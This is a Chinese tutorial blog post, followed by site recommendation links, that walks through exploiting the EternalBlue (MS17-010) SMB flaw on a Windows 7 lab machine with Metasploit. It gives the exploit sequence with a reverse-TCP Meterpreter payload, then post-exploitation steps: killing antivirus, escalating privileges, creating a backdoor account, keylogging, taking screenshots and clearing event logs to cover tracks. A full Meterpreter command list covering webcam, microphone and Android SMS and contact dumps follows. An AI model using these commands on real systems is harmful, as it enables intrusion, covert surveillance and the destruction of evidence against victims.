|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负!

简介

一、概述

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。

二、影响

2017年5月12日,不法分子通>过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

0.环境

  • 虚拟机(攻) KaliLinux
  • 虚拟机(靶机) Windows7
  • 同一局域网下

1.查询ip

  1. ifconfig

Kali:192.168.43.149

  1. ipconfig

Win7:192.168.43.82

2.打开metasploit工具

  1. msfconsole

进入metasploit框架

3.搜询永恒之蓝漏洞

  1. search ms17-010

4.使用辅助模块(非必要)

查看漏洞所需要配置。扫描存在此漏洞的主机,或判断指定主机是否存在该漏洞。

  • 1.使用辅助模块

    use auxiliary/scanner/smb/smb_ms17_010
  • 2.查看漏洞需要的配置

    show options



    可见该漏洞是需要主机开放445端口,且利用的是SMB服务进行攻击的。
  • 3.探测某ip范围内是有否存在该漏洞的主机

    set RHOST 192.168.43.80-192.168.43.180

    exploit

图中带[+]符号表示该主机192.168.43.82存在此漏洞(正是我们的靶机Windows7)。

5.使用漏洞模块

  1. use exploit/windows/smb/ms17_010_eternalblue

1.查看漏洞针对的系统、版本等

show targes



2.查看攻击载荷payloads

show payloads



3.查看漏洞的详细(全部)信息

info



6.设置参数

查看需要设置的参数

show options

设置攻击载荷

  1. set payload windows/x64/meterpreter/reverse_tcp

攻击靶机

  1. set rhost 192.168.43.82

监听端

  1. set lhost 192.168.43.149

监听端口(不设置默认为4444)

  1. set lport xxxx

运行

  1. exploit/run





显示meterpreter>说明攻击成功

7.演示 (后渗透阶段)

1).来次优雅的攻击

  • 进入win7终端
  1. shell
  • 打开计算器
  1. calc

  • 退出
  1. exit

2).常用命令

  • 查看主机信息
  1. sysinfo

  • 查看主机是否运行在虚拟机上
  1. run post/windows/gather/checkvm

当然我们用的为虚拟机win7。真实环境下防止连接的为虚拟机,调虎离山。(?蜜罐)

  • 关闭杀毒软件
  1. run killav

  • 文件操作(同linux)
  1. pwd
  2. cd
  3. mkdir
  4. rmdir
  5. rm
  6. mv
  7. cat
  8. ls
  9. edit



  • 提升到系统权限
  1. getsystem
  • 查看主机安装了那些应用
  1. run post/windows/gather/enum_applications
  • 截屏
  1. screenshot



3).其它命令

  • 创建新的用户
  1. run getgui -u hack2 -p 123456

  • 查看当前进程
  1. getpid
  • 查看所有进程
  1. ps
  • 关闭进程
  1. kill pid
  • 绑定进程
  1. migrate pid
  • 记录键盘(通常需要绑定进程后)
  1. 开始 keyscan_start
  2. 显示 keyscan_dump
  3. 结束 keyscan_stop
  1. 禁用(允许)键盘 uictl disable (enable) keyboard
  2. 禁用(允许)鼠标 uictl disable (enable) mouse

4).最后别忘清理操作日志文件擦屁股哈哈哈

  1. clearev

8.全部命令

翻译见 |>>>Msf---控制 Android手机<<<|

  1. Stdapi: File system Commands
  2. ============================
  3. Command Description
  4. ------- -----------
  5. cat Read the contents of a file to the screen
  6. cd Change directory
  7. checksum Retrieve the checksum of a file
  8. cp Copy source to destination
  9. dir List files (alias for ls)
  10. download Download a file or directory
  11. edit Edit a file
  12. getlwd Print local working directory
  13. getwd Print working directory
  14. lcd Change local working directory
  15. lls List local files
  16. lpwd Print local working directory
  17. ls List files
  18. mkdir Make directory
  19. mv Move source to destination
  20. pwd Print working directory
  21. rm Delete the specified file
  22. rmdir Remove directory
  23. search Search for files
  24. upload Upload a file or directory
  25. Stdapi: Networking Commands
  26. ===========================
  27. Command Description
  28. ------- -----------
  29. ifconfig Display interfaces
  30. ipconfig Display interfaces
  31. portfwd Forward a local port to a remote service
  32. route View and modify the routing table
  33. Stdapi: System Commands
  34. =======================
  35. Command Description
  36. ------- -----------
  37. execute Execute a command
  38. getuid Get the user that the server is running as
  39. localtime Displays the target system's local date and time
  40. pgrep Filter processes by name
  41. ps List running processes
  42. shell Drop into a system command shell
  43. sysinfo Gets information about the remote system, such as OS
  44. Stdapi: User interface Commands
  45. ===============================
  46. Command Description
  47. ------- -----------
  48. screenshare Watch the remote user's desktop in real time
  49. screenshot Grab a screenshot of the interactive desktop
  50. Stdapi: Webcam Commands
  51. =======================
  52. Command Description
  53. ------- -----------
  54. record_mic Record audio from the default microphone for X seconds
  55. webcam_chat Start a video chat
  56. webcam_list List webcams
  57. webcam_snap Take a snapshot from the specified webcam
  58. webcam_stream Play a video stream from the specified webcam
  59. Stdapi: Audio Output Commands
  60. =============================
  61. Command Description
  62. ------- -----------
  63. play play a waveform audio file (.wav) on the target system
  64. Android Commands
  65. ================
  66. Command Description
  67. ------- -----------
  68. activity_start Start an Android activity from a Uri string
  69. check_root Check if device is rooted
  70. dump_calllog Get call log
  71. dump_contacts Get contacts list
  72. dump_sms Get sms messages
  73. geolocate Get current lat-long using geolocation
  74. hide_app_icon Hide the app icon from the launcher
  75. interval_collect Manage interval collection capabilities
  76. send_sms Sends SMS from target session
  77. set_audio_mode Set Ringer Mode
  78. sqlite_query Query a SQLite database from storage
  79. wakelock Enable/Disable Wakelock
  80. wlan_geolocate Get current lat-long using WLAN information
  81. Application Controller Commands
  82. ===============================
  83. Command Description
  84. ------- -----------
  85. app_install Request to install apk file
  86. app_list List installed apps in the device
  87. app_run Start Main Activty for package name
  88. app_uninstall Request to uninstall application

Msf--永恒之蓝 ms17_010的更多相关文章

  1. 永恒之蓝ms17_010漏洞复现

    1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2.SMB协议 SM ...

  2. Metasploit(msf)利用ms17_010(永恒之蓝)出现Encoding::UndefinedConversionError问题

    Metasploit利用ms17_010(永恒之蓝) 利用流程 先确保目标靶机和kali处于同一网段,可以互相Ping通 目标靶机防火墙关闭,开启了445端口 输入search ms17_010 搜索 ...

  3. PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

    猫宁!!! 参考: https://www.anquanke.com/post/id/86245 https://xz.aliyun.com/t/2536 https://www.cnblogs.co ...

  4. EternalBlue永恒之蓝漏洞复现

    EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”( ...

  5. Metasploitable3学习笔记--永恒之蓝漏洞复现

    漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不 ...

  6. 永恒之蓝(MS17-010)检测与利用

    目录 利用Nmap检测 MSF反弹SHELL 注意 乱码 参考 利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加 ...

  7. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  8. 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法

    日期:2018-07-21 21:09:16 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell.查看文件.获取密码. 0x01.实验环境 攻击机 系统:macOS Sierra 10.12 ...

  9. MS17-010远程溢出漏洞 - 永恒之蓝 [CVE-2017-0143]

    MS17-010远程溢出漏洞(永恒之蓝) Ti:2019-12-25 By:Mirror王宇阳 MS17-010 CVE-2017-0143 MS17-010 CVE-2017-0144 MS17-0 ...

  10. 永恒之蓝MS17-010漏洞复现

    永恒之蓝MS17-010漏洞复现 1.漏洞描述: 起因: 永恒之蓝(Eternalblue)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包 ...

随机推荐

  1. ls(list)命令详解及生产使用示例

    文件有文件名与数据,在linux上被分为两个部分:用户数据(user data)与元数据(metadata) 用户数据,即文件数据块(data block),数据块是记录文件真实内容的地方,我们将其称 ...

  2. java面试-CAS底层原理

    一.CAS是什么? 比较并交换,它是一条CPU并发原语. CAS是一种无锁算法,CAS有3个操作数,内存值V,旧的预期值A,要修改的新值B.当且仅当预期值A和内存值V相同时,将内存值V修改为B,否则什 ...

  3. 【ProLog - 3.0 进阶:递归】

    [ProLog中的递归] 如果递归中的一个或多个规则引用谓词本身,则对该谓词使用"递归"定义 在使用时,这往往像一条食物链或者族谱的构成(A的爸爸的爸爸,即A的爷爷,是A的长辈) ...

  4. Java性能调优实战,覆盖80%以上调优场景

    Java 性能调优对于每一个奋战在开发一线的技术人来说,随着系统访问量的增加.代码的臃肿,各种性能问题便会层出不穷. 日渐复杂的系统,错综复杂的性能调优,都对Java工程师的技术广度和技术深度提出了更 ...

  5. 无线网络的应用之aircrack-ng

    在kalilinux的aircracke-ng中.在这儿描述自己所遇到的问题并给予写blog 在使用之前,需要确定是否有对应的支持无线网卡监听的网卡,在虚拟机中需要先将网卡的驱动重定向到虚拟机内 在终 ...

  6. 黑马架构师v2.5.1 (codeUtil)使用注意事项

    资源 1.资料里的codeutil软件有问题,使用时部分类和接口文件名后有一串日期数字等.码云的没问题 2.生成代码后zookeeper的IP改为本机的

  7. Spring Boot demo系列(八):Swagger

    2021.2.24 更新 1 概述 Swagger主要用于生成API文档,本文演示了如何使用目前最新的OpenAPI3以及Swagger来进行接口文档的生成. 2 依赖 <dependency& ...

  8. 04.ElementUI源码学习:组件封装、说明文档的编写发布

    0x00.前言 书接上文.项目经过一系列的配置,开发脚手架已经搭建完毕.接下来开始封装自定义组件.并基于 markdown 文件生成文档和演示案例. 后续文章代码会根据篇幅,不影响理解的情况下进行部分 ...

  9. 有了CopyOnWrite为何又要有ReadWriteLock?

    引言 前文我们有介绍<看了CopyOnWriteArrayList后自己实现了一个CopyOnWriteHashMap> 关于CopyOnWrite容器的,但是它也有一些缺点: 内存占用问 ...

  10. spring data jpa之Auditing 表的创建时间,更新时间自动生成策略

    java实际编程中,几乎每一张表都会有createTime和updateTime字段,spring的优秀之处在于只要用几个注解,就帮我们解决该类问题,具体实现: 1,实体类添加注解: @EntityL ...